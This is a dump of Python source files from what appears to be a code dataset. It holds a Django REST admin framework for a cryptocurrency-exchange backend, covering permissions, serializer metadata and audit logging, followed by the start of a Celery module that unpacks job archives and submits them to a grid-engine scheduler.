GenericAllFieldsFilter\nfrom admin_rest.utils import get_user_permissions\nfrom core.currency import CurrencyModelField\nfrom core.models.inouts.pair import PairModelField, PairSerialRestField\nfrom lib.fields import JSDatetimeField, RichTextField, RichTextSerialField, ImageSerialField, TextSerialField, \\\n    JsonSerialField, SVGAndImageField\n\nUser = get_user_model()\n\n\nclass AlreadyRegistered(Exception):\n    pass\n\n\nclass NotRegistered(Exception):\n    pass\n\n\nclass ImproperlyConfigured(Exception):\n    pass\n\n\nclass AuthPermissionViewSetMixin:\n    NOT_FOUND_PERMISSION_DEFAULT = False\n    permission_map = dict()\n\n    def get_permission_map(self):\n        permission_map = {\n            'list': self._make_permission_key('view'),\n            'retrieve': self._make_permission_key('view'),\n            'create': self._make_permission_key('add'),\n            'update': self._make_permission_key('change'),\n            'partial_update': self._make_permission_key('change'),\n            'destroy': self._make_permission_key('delete'),\n        }\n        permission_map.update(self.permission_map)\n        return permission_map\n\n    @cached_property\n    def _options(self):\n        return self.queryset.model._meta\n\n    def _make_permission_key(self, action):\n        code_name = get_permission_codename(action, self._options)\n        return \"{0}.{1}\".format(self._options.app_label, code_name)\n\n    def has_perm_action(self, action, request, obj=None):\n        if not action:\n            return False\n\n        if action == 'metadata':\n            return True\n\n        perm_map = self.get_permission_map()\n        if hasattr(getattr(self, action), 'permissions'):\n            perm_map.update(**{action: getattr(self, action).permissions})\n\n        if action not in perm_map:\n            return self.NOT_FOUND_PERMISSION_DEFAULT\n\n        perm_code = perm_map[action]\n        if callable(perm_code):\n            return perm_code(self, action, request, obj)\n        if isinstance(perm_code, bool):\n            return perm_code\n\n        if perm_code in ['view', 'add', 'change', 'delete']:\n            perm_code = self._make_permission_key(perm_code)\n\n        # checks list of permissions\n        if isinstance(perm_code, list) or isinstance(perm_code, tuple):\n            for code in perm_code:\n                if code in ['view', 'add', 'change', 'delete']:\n                    code = self._make_permission_key(code)\n                has_perm = request.user.has_perm(code)\n                if has_perm:\n                    return has_perm\n            return False\n\n        return request.user.has_perm(perm_code)\n\n\nclass IsStaffAccess(BasePermission):\n    \"\"\"\n    Allows access only to authenticated staff users.\n    \"\"\"\n\n    def has_permission(self, request, view):\n        return bool(request.user and request.user.is_authenticated and request.user.is_staff)\n\n    def has_object_permission(self, request, view, obj):\n        \"\"\"\n        Return `True` if permission is granted, `False` otherwise.\n        \"\"\"\n        return self.has_permission(request, view)\n\n\nclass HasPermissionAccess(BasePermission):\n    \"\"\"\n    Allows access only to users whose permissions cover the requested action.\n    \"\"\"\n\n    def has_permission(self, request, view):\n        assert hasattr(view, 'get_permission_map'), \"\"\"\n            Must inherit from RestFulModelAdmin to use this permission\n        \"\"\"\n        return view.has_perm_action(view.action, request)\n\n    def has_object_permission(self, request, view, obj):\n        \"\"\"\n        Return `True` if permission is granted, `False` otherwise.\n        \"\"\"\n        return view.has_perm_action(view.action, request, obj)\n\n\nclass ModelDiffHelper(object):\n    def __init__(self, initial):\n        self.__initial = self._dict(initial)\n        self._new_object = None\n\n    def set_changed_model(self, new_object):\n        data = self._dict(new_object)\n        if self._new_object is not None:\n            self.__initial = data\n        self._new_object = data\n        return self\n\n    @property\n    
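# Usage sketch (hypothetical): helper = ModelDiffHelper(obj); <mutate and save obj>; helper.set_changed_model(obj).diff -> {'field': (old_value, new_value)}\n    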
def diff(self):\n if not self._new_object:\n return {}\n d1 = self.__initial\n d2 = self._new_object\n diffs = [(k, (v, d2[k])) for k, v in d1.items() if v != d2[k]]\n return dict(diffs)\n\n @property\n def has_changed(self):\n return bool(self.diff)\n\n @property\n def changed_fields(self):\n return list(self.diff.keys())\n\n def get_field_diff(self, field_name):\n \"\"\"\n Returns a diff for field if it's changed and None otherwise.\n \"\"\"\n return self.diff.get(field_name, None)\n\n def _dict(self, model):\n return model_to_dict(model, fields=[field.name for field in\n model._meta.fields])\n\n\nclass CustomMetadata(SimpleMetadata):\n label_lookup = SimpleMetadata.label_lookup\n\n def __init__(self, *args, **kwargs):\n super(CustomMetadata, self).__init__(*args, **kwargs)\n #TODO make consts for out fields\n self.label_lookup[JSDatetimeField] = 'datetime'\n self.label_lookup[PrimaryKeyRelatedField] = 'foreign'\n self.label_lookup[ManyRelatedField] = 'foreign'\n self.label_lookup[SerializerMethodField] = 'string'\n self.label_lookup[CurrencySerialRestField] = 'choice'\n self.label_lookup[PairSerialRestField] = 'choice'\n self.label_lookup[ImageField] = 'image-upload'\n self.label_lookup[ImageSerialField] = 'image-upload'\n self.label_lookup[RichTextSerialField] = 'rich-text'\n self.label_lookup[TextSerialField] = 'text'\n self.label_lookup[JsonSerialField] = 'json'\n self.label_lookup[ForeignSerialField] = 'foreign'\n\n def determine_metadata(self, request, view):\n metadata = OrderedDict()\n # view name\n metadata['name'] = view.get_view_name()\n # view detail page fields\n metadata['fields'] = []\n # view list page fields\n metadata['list_fields'] = []\n # actions with queryset\n metadata['actions'] = []\n # global actions. Queryset not used\n metadata['global_actions'] = []\n # ref models in detail page of entry\n metadata['inline_forms'] = []\n\n metadata['filters'] = []\n\n metadata['search_enabled'] = False\n\n if hasattr(view, 'get_single_serializer'):\n serializer = view.get_single_serializer()\n fields = self.get_serializer_info(serializer)\n metadata['fields'] = fields\n\n if hasattr(view, 'get_serializer'):\n serializer = view.get_serializer()\n fields = self.get_serializer_info(serializer)\n metadata['list_fields'] = fields\n\n if hasattr(view, 'actions'):\n actions = self.get_actions(view, view.actions)\n metadata['actions'] = actions\n\n if hasattr(view, 'global_actions'):\n actions = self.get_actions(view, view.global_actions)\n metadata['global_actions'] = actions\n\n if hasattr(view, 'inline_forms'):\n inlines = self.get_inline_forms(view, view.inline_forms)\n metadata['inline_forms'] = inlines\n\n if getattr(view, 'search_fields', None):\n metadata['search_enabled'] = True\n\n if getattr(view, 'filterset_fields', None):\n serializer = view.get_all_fields_serializer()\n fields = self.get_serializer_info(serializer)\n metadata['filters'] = {k: v for k, v in fields.items() if v['filterable']}\n\n\n return metadata\n\n def get_inline_forms(self, view, inlines):\n res = []\n for inline, filter_by in inlines:\n if isinstance(filter_by, str):\n filter_by = {filter_by: 'id'}\n if isinstance(filter_by, list):\n filter_by = {v: 'id' for v in filter_by}\n res.append({\n 'resource': site.get_resource_name_by_view_class(inline),\n 'filter_by': filter_by,\n 'fields': inline.list_display\n })\n return res\n\n def get_actions(self, view, view_actions):\n actions = []\n for action_name in view_actions:\n if not view.has_perm_action(action_name, view.request):\n continue\n\n action_fn = 
getattr(view, action_name, None)\n if action_fn:\n info = {\n 'url': view.reverse_action(action_name.replace('_', '-')),\n 'name': getattr(action_fn, 'short_description', action_fn.__name__),\n 'fields': [],\n }\n\n if isinstance(view_actions, dict):\n fields = []\n for field in view_actions[action_name]:\n if isinstance(field, str):\n field = {\n 'name': field,\n 'label': field.capitalize(),\n }\n\n # default text type\n if 'type' not in field:\n field['type'] = 'text'\n fields.append(field)\n info['fields'] = fields\n\n actions.append(info)\n\n return actions\n\n def get_field_attributes(self, serializer_field, model_field):\n attributes = OrderedDict()\n\n default = getattr(model_field, 'default', NOT_PROVIDED)\n is_nullable = getattr(model_field, 'null', None)\n is_read_only = getattr(serializer_field, 'read_only', None)\n # attributes['required'] = (default is NOT_PROVIDED) and not is_nullable and is_read_only\n\n attributes['required'] = getattr(serializer_field, 'required', False)\n attributes['nullable'] = getattr(model_field, 'null', False)\n\n attrs_dict = {\n 'read_only': 'read_only',\n 'label': 'label',\n 'help_text': 'hint',\n 'min_length': 'min_length',\n 'max_length': 'max_length',\n 'min_value': 'min',\n 'max_value': 'max',\n }\n\n for attr, front_attr in attrs_dict.items():\n value = getattr(serializer_field, attr, None)\n if value is not None and value != '':\n attributes[front_attr] = force_str(value, strings_only=True)\n\n if getattr(serializer_field, 'child', None):\n attributes['child'] = self.get_field_info(serializer_field.child)\n elif getattr(serializer_field, 'fields', None):\n attributes['children'] = self.get_serializer_info(serializer_field)\n\n if not isinstance(serializer_field, (serializers.RelatedField, serializers.ManyRelatedField)):\n if hasattr(serializer_field, 'choices'):\n attributes['choices'] = []\n if is_nullable:\n attributes['choices'].append({'value': None, 'text': '<empty>'})\n attributes['choices'].extend([\n {\n 'value': choice_value,\n 'text': force_str(choice_name, strings_only=True)\n }\n for choice_value, choice_name in serializer_field.choices.items()\n ])\n\n if self.label_lookup[serializer_field] == 'foreign':\n if isinstance(serializer_field, ManyRelatedField):\n model = serializer_field.child_relation.queryset.model\n attributes['multiple'] = True\n else:\n model = model_field.related_model\n attributes['reference'] = f'{site.get_resource_name(model)}'\n return attributes\n\n def get_field_info(self, field):\n \"\"\"\n Given an instance of a serializer field, return a dictionary\n of metadata about it.\n \"\"\"\n view = field.context['view']\n model_fields = {f.name: f for f in view._options.fields}\n model_field = model_fields.get(field.field_name)\n\n sortable_fields = getattr(view, 'ordering_fields', '__all__')\n filterable_fields = getattr(view, 'filterset_fields', None)\n\n field_info = OrderedDict()\n field_info['type'] = self.label_lookup[field]\n field_info['source'] = field.field_name\n field_info['sortable'] = False\n field_info['filterable'] = False\n\n field_info['default'] = self.get_field_default_value(model_field)\n\n if sortable_fields == '__all__' or (isinstance(sortable_fields, list) and field.field_name in sortable_fields):\n field_info['sortable'] = True\n\n if (isinstance(filterable_fields, list) or isinstance(filterable_fields, tuple)) \\\n and field.field_name in filterable_fields:\n field_info['filterable'] = True\n\n field_info['attributes'] = self.get_field_attributes(field, model_field)\n 
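# 'searchable' is derived from the admin's vue_resource_extras['searchable_fields'] list, when one is provided.\n        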
field_info['attributes']['searchable'] = field.field_name in (view.vue_resource_extras.get('searchable_fields') or [])\n\n        return field_info\n\n    def get_field_default_value(self, model_field):\n        default = getattr(model_field, 'default', None)\n        if default is NOT_PROVIDED:\n            default = None\n        elif callable(default):\n            default = default()\n\n        if isinstance(model_field, JSONField) or isinstance(model_field, models.JSONField):\n            default = json.dumps(default, indent=2)\n        return default\n\n\nclass RestFulModelAdmin(AuthPermissionViewSetMixin, viewsets.ModelViewSet):\n    queryset = None\n    single_serializer_class = None\n    permission_classes = (IsStaffAccess, HasPermissionAccess)\n    list_display = '__all__'\n    fields = '__all__'\n    readonly_fields = []\n    ordering_fields = '__all__'\n    filterset_fields = []\n    search_fields = []\n    metadata_class = CustomMetadata\n    filter_backends = (GenericAllFieldsFilter, filters.OrderingFilter, filters.SearchFilter)\n    vue_resource_extras: dict = {}\n    inline_forms: list  # detail page entities\n\n    def __init__(self, *args, **kwargs):\n        super(RestFulModelAdmin, self).__init__(*args, **kwargs)\n        filterset_fields = set(self.filterset_fields)\n        filterset_fields.add('id')\n\n        for field in self._options.fields:\n            if type(field) in [models.OneToOneField, models.ForeignKey, models.ManyToManyField]:\n                filterset_fields.add(field.name + '_id')\n\n        self.filterset_fields = tuple(filterset_fields)\n\n    def get_readonly_fields(self):\n        return self.readonly_fields\n\n    @classmethod\n    def has_add_permission(cls):\n        return True\n\n    @classmethod\n    def has_update_permission(cls):\n        return True\n\n    @classmethod\n    def has_delete_permission(cls):\n        return True\n\n    @classmethod\n    def get_view_permissions(cls):\n        res = ['show', 'list']\n        if cls.has_add_permission():\n            res.append('create')\n        if cls.has_update_permission():\n            res.append('edit')\n        if cls.has_delete_permission():\n            res.append('delete')\n        return res\n\n    @staticmethod\n    def get_doc():\n        return 'asd'\n\n    def get_urls(self):\n        return []\n\n    def get_permission_map(self):\n        permission_map = {\n            'list': self._make_permission_key('view'),\n            'retrieve': self._make_permission_key('view'),\n            'create': self._make_permission_key('add'),\n            'update': self._make_permission_key('change'),\n            'partial_update': self._make_permission_key('change'),\n            'destroy': self._make_permission_key('delete'),\n        }\n        permission_map.update(self.permission_map)\n        return permission_map\n\n    def log_addition(self, request, object, message):\n        \"\"\"\n        Log that an object has been successfully added.\n\n        The default implementation creates an admin LogEntry object.\n        \"\"\"\n        from django.contrib.admin.models import LogEntry, ADDITION\n        return LogEntry.objects.log_action(\n            user_id=request.user.pk,\n            content_type_id=get_content_type_for_model(object).pk,\n            object_id=object.pk,\n            object_repr=str(object),\n            action_flag=ADDITION,\n            change_message=message,\n        )\n\n    def log_change(self, request, object, message):\n        \"\"\"\n        Log that an object has been successfully changed.\n\n        The default implementation creates an admin LogEntry object.\n        \"\"\"\n        from django.contrib.admin.models import LogEntry, CHANGE\n        return LogEntry.objects.log_action(\n            user_id=request.user.pk,\n            content_type_id=get_content_type_for_model(object).pk,\n            object_id=object.pk,\n            object_repr=str(object),\n            action_flag=CHANGE,\n            change_message=message,\n        )\n\n    def log_deletion(self, request, object, object_repr):\n        \"\"\"\n        Log that an object will be deleted. 
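(This mirrors django.contrib.admin.ModelAdmin.log_deletion.) 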
Note that this method must be\n called before the deletion.\n\n The default implementation creates an admin LogEntry object.\n \"\"\"\n from django.contrib.admin.models import LogEntry, DELETION\n return LogEntry.objects.log_action(\n user_id=request.user.pk,\n content_type_id=get_content_type_for_model(object).pk,\n object_id=object.pk,\n object_repr=object_repr,\n action_flag=DELETION,\n )\n\n def get_single_serializer_class(self):\n return self.single_serializer_class if self.single_serializer_class else self.get_serializer_class(True)\n\n def get_all_fields_serializer(self, *args, **kwargs):\n serializer_class = self.get_serializer_class(all_fields=True)\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n\n def get_single_serializer(self, *args, **kwargs):\n \"\"\"\n Return the serializer instance that should be used for validating and\n deserializing input, and for serializing output.\n \"\"\"\n serializer_class = self.get_single_serializer_class()\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n\n def get_serializer_representation_fn(self, cls):\n \"\"\"Custom fields representation fn\"\"\"\n def validate_fn(sf, instance):\n \"\"\"\n Object instance -> Dict of primitive datatypes.\n \"\"\"\n ret = OrderedDict()\n fields = sf._readable_fields\n\n for field in fields:\n try:\n attribute = field.get_attribute(instance)\n except SkipField:\n continue\n\n # We skip `to_representation` for `None` values so that fields do\n # not have to explicitly deal with that case.\n #\n # For related fields with `use_pk_only_optimization` we need to\n # resolve the pk value.\n check_for_none = attribute.pk if isinstance(attribute, PKOnlyObject) else attribute\n if check_for_none is None:\n ret[field.field_name] = None\n else:\n repr = field.to_representation(attribute)\n if isinstance(field, JsonSerialField) or isinstance(field, RichTextSerialField):\n repr = mark_safe(repr)\n if isinstance(repr, str) and not isinstance(repr, SafeString):\n repr = escape(repr)\n ret[field.field_name] = repr\n return ret\n\n return validate_fn\n\n def get_serializer_class(self, single=False, all_fields=False):\n serializer_class = super().get_serializer_class()\n\n view_fields = self.fields if single else self.list_display\n if isinstance(view_fields, tuple):\n view_fields = list(view_fields)\n\n if not view_fields or view_fields == '__all__' or all_fields:\n serializer_class_fields = list([f.name for f in serializer_class.Meta.model._meta.fields])\n else:\n if 'id' not in view_fields:\n view_fields = ['id'] + view_fields\n serializer_class_fields = view_fields\n\n serializer_class_fields += ['_label'] # default object representation\n\n # redefine serializer fields\n serializer_class._declared_fields = {}\n for field_name in serializer_class_fields:\n if callable(getattr(self, field_name, None)):\n # add SerializerMethodField and its method to serializer\n field_method = getattr(self, field_name)\n # if custom field type defined\n if hasattr(field_method, 'serial_class'):\n serializer_class._declared_fields[field_name] = field_method.serial_class()\n else:\n serializer_class._declared_fields[field_name] = SerializerMethodField()\n setattr(serializer_class, f'get_{field_name}', field_method)\n if field_name == '_label':\n serializer_class._declared_fields[field_name] = SerializerMethodField()\n setattr(serializer_class, f'get_{field_name}', lambda self_cls, obj: str(obj))\n\n # setup readonly fields\n readonly_fields = 
self.get_readonly_fields()\n if isinstance(readonly_fields, list) or isinstance(readonly_fields, tuple):\n serializer_class.Meta.read_only_fields = readonly_fields\n\n # search original classes for translated fields and delete original field\n translated_fields_classes = {}\n to_remove_original_translated_fields = set()\n serializer_fields_classes = {f.name: f.__class__ for f in serializer_class.Meta.model._meta.fields}\n for model_field in serializer_class.Meta.model._meta.fields:\n if model_field.__class__.__name__.startswith('Translation'):\n original_field_name = model_field.name.rsplit('_', 1)[0]\n to_remove_original_translated_fields.add(original_field_name)\n if original_field_name in serializer_fields_classes:\n translated_fields_classes[model_field.name] = serializer_fields_classes[original_field_name]\n else:\n to_remove_original_translated_fields.add(model_field.name)\n\n serializer_class_fields = [f for f in serializer_class_fields\n if f not in to_remove_original_translated_fields]\n\n # custom fields\n for model_field in serializer_class.Meta.model._meta.fields:\n if model_field.name not in serializer_class_fields:\n # skip missing fields\n continue\n\n CustomField = None\n field_args = {}\n\n field_type = type(model_field)\n\n # handle translated fields\n if model_field.name in translated_fields_classes:\n field_type = translated_fields_classes[model_field.name]\n\n if isinstance(model_field, models.DateTimeField):\n CustomField = JSDatetimeField\n elif isinstance(model_field, models.ForeignKey) and not single:\n CustomField = ForeignSerialField\n elif field_type == CurrencyModelField:\n CustomField = CurrencySerialRestField\n elif field_type == PairModelField:\n CustomField = PairSerialRestField\n elif field_type == RichTextField:\n CustomField = RichTextSerialField\n elif field_type == models.TextField:\n CustomField = TextSerialField\n elif field_type in [models.ImageField, SVGAndImageField, ImageSerialField]:\n CustomField = ImageSerialField\n elif field_type in [JSONField, models.JSONField]:\n CustomField = JsonSerialField\n\n if CustomField:\n is_read_only = model_field.name in readonly_fields \\\n or getattr(model_field, 'auto_now', False) \\\n or getattr(model_field, 'auto_now_add', False)\n default = getattr(model_field, 'default', NOT_PROVIDED)\n is_nullable = getattr(model_field, 'null', None)\n if CustomField != ForeignSerialField:\n field_args['required'] = (default is NOT_PROVIDED) and not is_nullable and not is_read_only\n\n field_args['read_only'] = is_read_only\n field_args['allow_null'] = model_field.null\n if CustomField in [TextSerialField, RichTextSerialField]:\n field_args['allow_blank'] = model_field.blank\n serializer_class._declared_fields[model_field.name] = CustomField(**field_args)\n\n serializer_class.Meta.fields = serializer_class_fields\n setattr(serializer_class, 'to_representation', self.get_serializer_representation_fn(serializer_class))\n return serializer_class\n\n def list(self, request, *args, **kwargs):\n \"\"\"list all of objects\"\"\"\n queryset = self.filter_queryset(self.get_queryset())\n\n page = self.paginate_queryset(queryset)\n if page is not None:\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n\n def create(self, request, **kwargs):\n \"\"\"Create new object\"\"\"\n serializer = self.get_single_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n 
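# perform_create() saves the new instance; the LogEntry below mirrors Django admin's 'added' change-history format.\n        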
self.perform_create(serializer)\n self.log_addition(request, serializer.instance, [{'added': {\n 'name': str(serializer.instance._meta.verbose_name),\n 'object': str(serializer.instance),\n }}])\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def retrieve(self, request, pk=None, **kwargs):\n \"\"\"Get object Details\"\"\"\n instance = self.get_object()\n serializer = self.get_single_serializer(instance)\n return Response(serializer.data)\n\n def update(self, request, pk=None, **kwargs):\n \"\"\"Update object\"\"\"\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n serializer = self.get_single_serializer(instance, data=request.data, partial=partial)\n serializer.is_valid(raise_exception=True)\n helper = ModelDiffHelper(instance)\n self.perform_update(serializer)\n\n self.log_change(\n request,\n serializer.instance,\n [{'changed': {\n 'name': str(serializer.instance._meta.verbose_name),\n 'object': str(serializer.instance),\n 'fields': helper.set_changed_model(serializer.instance).changed_fields\n }}]\n )\n\n if getattr(instance, '_prefetched_objects_cache', None):\n # If 'prefetch_related' has been applied to a queryset, we need to\n # forcibly invalidate the prefetch cache on the instance.\n instance._prefetched_objects_cache = {}\n\n return Response(serializer.data)\n\n def partial_update(self, request, pk=None, **kwargs):\n \"\"\"Partial Update\"\"\"\n return super().partial_update(request, pk=pk, **kwargs)\n\n def destroy(self, request, pk=None, **kwargs):\n \"\"\"Delete object\"\"\"\n instance = self.get_object()\n self.log_deletion(request, instance, [{\n 'deleted': {\n 'name': str(instance._meta.verbose_name),\n 'object': str(instance),\n }\n }])\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass RestFulAdminSite:\n def __init__(self, view_class=RestFulModelAdmin):\n self._registry = {}\n self._model_by_view_registry = {}\n self._url_patterns = []\n self.default_view_class = view_class\n\n def get_registered_models(self):\n res = []\n for model in self._registry:\n res.append(self.get_model_url(model))\n return sorted(res)\n\n def get_resource_name_by_view_class(self, view_class):\n inv_map = {v: k for k, v in self._registry.items()}\n model = inv_map.get(view_class)\n if model:\n return self.get_resource_name(model)\n model = self._model_by_view_registry.get(view_class)\n if model:\n return self.get_resource_name(model)\n\n def get_resources(self):\n res = []\n for model, view in self._registry.items():\n # https://www.okami101.io/vuetify-admin/guide/resources.html#resource-object-structure\n data = {\n 'name': self.get_resource_name(model),\n 'actions': view.get_view_permissions(),\n 'api': f'/{self.get_model_url(model)}/',\n 'aside': False,\n }\n if view.vue_resource_extras:\n data.update(view.vue_resource_extras)\n\n res.append(data)\n return res\n\n def make_navigation(self, user):\n all_permissions = get_user_permissions(user)\n is_admin = 'admin' in all_permissions\n menu = settings.VUE_ADMIN_SIDE_MENU\n\n new_menu = []\n\n for entry in menu:\n model = entry.get('model')\n if not model:\n new_menu.append(entry)\n else:\n app_label, model_name = model.split('.')\n # todo check model existence\n view_perm_name = f'{app_label}_{model_name}_view'\n if is_admin or view_perm_name in all_permissions:\n new_menu.append({\n 'icon': entry.get('icon'),\n 'link': {'name': f'{app_label}_{model_name}_list'},\n 'text': 
entry.get('text') or (f'{app_label.capitalize()} {model_name.capitalize()}')\n })\n return new_menu\n\n def register_decorator(self, *model_or_iterable, **options):\n def wrapper(view_class):\n self.register(model_or_iterable, view_class, **options)\n return view_class\n\n return wrapper\n\n def register(self, model_or_iterable, view_class=None, **options):\n if not view_class:\n view_class = self.default_view_class\n\n if isinstance(model_or_iterable, ModelBase):\n model_or_iterable = [model_or_iterable]\n for model in model_or_iterable:\n if model._meta.abstract:\n raise ImproperlyConfigured(\n 'The model %s is abstract, so it cannot be registered with admin.' % model.__name__\n )\n\n if model in self._registry:\n raise AlreadyRegistered('The model %s is already registered' % model.__name__)\n options.update({\n \"__doc__\": self.generate_docs(model)\n })\n self._model_by_view_registry[view_class] = model\n view_class = type(\"%sAdmin\" % model.__name__, (view_class,), options)\n # self.set_docs(view_class, model)\n # Instantiate the admin class to save in the registry\n self._registry[model] = view_class\n\n def register_url_pattern(self, url_pattern):\n self._url_patterns.append(url_pattern)\n\n @classmethod\n def generate_docs(cls, model):\n return \"\"\"\n ### The APIs include:\n\n\n > `GET` {app}/{model} ===> list all `{verbose_name_plural}` page by page;\n\n > `POST` {app}/{model} ===> create a new `{verbose_name}`\n\n > `GET` {app}/{model}/123 ===> return the details of the `{verbose_name}` 123\n\n > `PATCH` {app}/{model}/123 and `PUT` {app}/{model}/123 ==> update the `{verbose_name}` 123\n\n > `DELETE` {app}/{model}/123 ===> delete the `{verbose_name}` 123\n\n > `OPTIONS` {app}/{model} ===> show the supported verbs regarding endpoint `{app}/{model}`\n\n > `OPTIONS` {app}/{model}/123 ===> show the supported verbs regarding endpoint `{app}/{model}/123`\n\n \"\"\".format(\n app=model._meta.app_label,\n model=model._meta.model_name,\n verbose_name=model._meta.verbose_name,\n verbose_name_plural=model._meta.verbose_name_plural\n )\n\n def unregister(self, model_or_iterable):\n \"\"\"\n Unregister the given model(s).\n\n If a model isn't already registered, raise NotRegistered.\n \"\"\"\n if isinstance(model_or_iterable, ModelBase):\n model_or_iterable = [model_or_iterable]\n for model in model_or_iterable:\n if model not in self._registry:\n raise NotRegistered('The model %s is not registered' % model.__name__)\n del self._registry[model]\n\n def is_registered(self, model):\n \"\"\"\n Check if a model class is registered with this `AdminSite`.\n \"\"\"\n return model in self._registry\n\n def get_model_basename(self, model):\n return None\n\n def get_model_url(self, model):\n return '%s/%s' % (model._meta.app_label, model._meta.model_name)\n\n def get_resource_name(self, model):\n return f'{model._meta.app_label}_{model._meta.model_name}'\n\n def get_urls(self):\n router = DefaultRouter()\n view_sets = []\n for model, view_set in self._registry.items():\n if view_set.queryset is None:\n view_set.queryset = model.objects.all()\n # Creates default serializer\n if view_set.serializer_class is None:\n serializer_class = type(\"%sModelSerializer\" % model.__name__, (ModelSerializer,), {\n \"Meta\": type(\"Meta\", (object,), {\n \"model\": model,\n \"fields\": \"__all__\"\n }),\n })\n view_set.serializer_class = serializer_class\n\n view_sets.append(view_set)\n router.register(self.get_model_url(model), view_set, self.get_model_basename(model))\n\n return router.urls + 
self._url_patterns\n\n @property\n def urls(self):\n return self.get_urls()\n\n\nsite = RestFulAdminSite()\n\n\ndef register(*model_or_iterable, **options):\n return site.register_decorator(*model_or_iterable, **options)\n\n\ndef action(permissions=None, methods=['POST'], detail=False, url_path=None, url_name=None, custom_response=False,\n **kwargs):\n def decorator(func):\n base_func = base_action(methods, detail, url_path, url_name, **kwargs)(func)\n base_func.permissions = permissions\n\n @wraps(base_func)\n def wrapper(base_admin_class, request, *args, **kwargs):\n ids = request.data.get('ids')\n\n Model = base_admin_class.serializer_class.Meta.model\n queryset = Model.objects.filter(id__in=ids) if ids else Model.objects.none()\n\n res = base_func(base_admin_class, request, queryset, *args, **kwargs)\n if queryset:\n for entry in queryset:\n LogEntry.objects.log_action(\n user_id=request.user.pk,\n content_type_id=get_content_type_for_model(entry).pk,\n object_id=entry.pk,\n object_repr=str(entry),\n action_flag=CHANGE,\n change_message=[{'action': {\n 'name': f'{base_admin_class.__class__.__name__} {base_func.__name__}',\n 'object': str(entry),\n }}],\n )\n else:\n LogEntry.objects.log_action(\n user_id=request.user.pk,\n content_type_id=None,\n object_id=None,\n object_repr='',\n action_flag=CHANGE,\n change_message=[{'action': {\n 'name': f'{base_admin_class.__class__.__name__} {base_func.__name__}',\n }}],\n )\n\n if custom_response:\n return res\n\n if res is None:\n return Response(status=status.HTTP_200_OK)\n return Response(res, status=status.HTTP_200_OK)\n\n return wrapper\n\n return decorator\n\n\nclass DefaultApiAdmin(RestFulModelAdmin):\n ordering = ('-id',)\n # permission_classes = (AllowAny, )\n # filter_backends = [GenericAllFieldsFilter, filters.OrderingFilter, filters.SearchFilter]\n","repo_name":"Polygant/OpenCEX-backend","sub_path":"admin_rest/restful_admin.py","file_name":"restful_admin.py","file_ext":"py","file_size_in_byte":37959,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"23765529590","text":"import celery\nimport logging\nimport pytz\nimport requests\nimport subprocess\nimport typing\nimport uuid\n\nfrom celery import task\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nfrom dateutil.parser import parse\nfrom django.conf import settings\nfrom django.db.models import F\nfrom django.utils import timezone\nfrom pathlib import Path\n\nfrom jobs.models import Job, JobLog, Priority, Status\nfrom jobs.serializers import JobSerializer\nfrom jobs.utils import TokenAuth\nfrom users.models import User\n\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n##test for push\n# Group of Celery task actions\n@task(bind=True, ignore_result=True)\ndef activate_job(self: celery.Task, *, pk: typing.Union[str, uuid.UUID]):\n \"\"\"\n Takes existing Job object instances from Django API\n Submits their data to the SCC for processing\n\n called via: `scheduled_allocate_job`\n\n \"\"\"\n try:\n job = Job.objects.get(pk=pk)\n\n if job.status == Status.QUEUED:\n job.status = Status.ACTIVE\n\n ftplus_path = Path(\n settings.SCC_FTPLUS_PATH, \"jobs-in-process\", f\"{job.uuid}\"\n )\n\n # have we already untarred our job files?\n if not ftplus_path.exists():\n ftplus_path.mkdir(parents=True)\n subprocess.run(\n [\n \"tar\",\n \"-xf\",\n f\"{job.input_file.path}\",\n \"-C\",\n f\"{ftplus_path}\",\n ]\n )\n\n # Ensure {ftplus_path}/settings.SCC_RUN_FILE exists\n try:\n runfile = 
ftplus_path.joinpath(settings.SCC_RUN_FILE)\n                if not runfile.exists():\n                    raise Exception(f\"{settings.SCC_RUN_FILE} doesn't exist\")\n\n                JobLog.objects.create(job=job, event=\"Job status changed to active\")\n\n                if job.priority == Priority.HIGH:\n                    priority = -100\n                elif job.priority == Priority.NORMAL:\n                    priority = -500\n                elif job.priority == Priority.LOW:\n                    priority = -1000\n                else:\n                    priority = -1000\n\n                # TODO: Add a priority to the job...\n                cmd = [\n                    f\"{settings.GRID_ENGINE_SUBMIT_CMD}\",\n                    \"-p\",\n                    f\"{priority}\",\n                    \"-cwd\",\n                    f\"{ftplus_path}/{settings.SCC_RUN_FILE}\",\n                ]\n                if job.priority == Priority.HIGH:\n                    cmd = [\"python\", f\"{ftplus_path}/{settings.SCC_RUN_FILE}\"]\n\n                logger.debug(cmd)\n\n                # qsub must be run from inside job.uuid directory\n                job_submit = subprocess.run(\n                    cmd, capture_output=True, text=True, cwd=ftplus_path\n                )\n                logger.debug(job_submit.stdout)\n\n                # Assign SGE ID to job\n                # Successful qsub stdout = Your job 6274206 (\"ls -al\") has been submitted\n                sge_task_id = job_submit.stdout.split(\" \")[2]\n                job.sge_task_id = int(sge_task_id)\n                job.save()\n                JobLog.objects.create(job=job, event=\"Job sge_task_id added\")\n\n            except Exception as e:\n                job.status = Status.ERROR\n                job.save()\n                msg = f\"Job status changed to error. Exception: {e}\"\n                JobLog.objects.create(job=job, event=msg)\n                logger.exception(msg)\n        else:\n            return\n\n    except Job.DoesNotExist:\n        logger.warning(f\"Job {pk} does not exist\")\n\n\n@task(bind=True, ignore_result=True)\ndef delete_job(self: celery.Task, *, pk: typing.Union[str, uuid.UUID]):\n    \"\"\"\n    Sets Job.status to Status.DELETED in Django\n    Also deletes the job directory and associated files on the SCC\n    \"\"\"\n    try:\n        job = Job.objects.get(pk=pk)\n\n        if job.status != Status.DELETED:\n            job.status = Status.DELETED\n            job.save()\n            JobLog.objects.create(job=job, event=\"Job status changed to deleted\")\n\n            # Grid Engine Qdel ONLY stops/deletes a job. We have to handle file 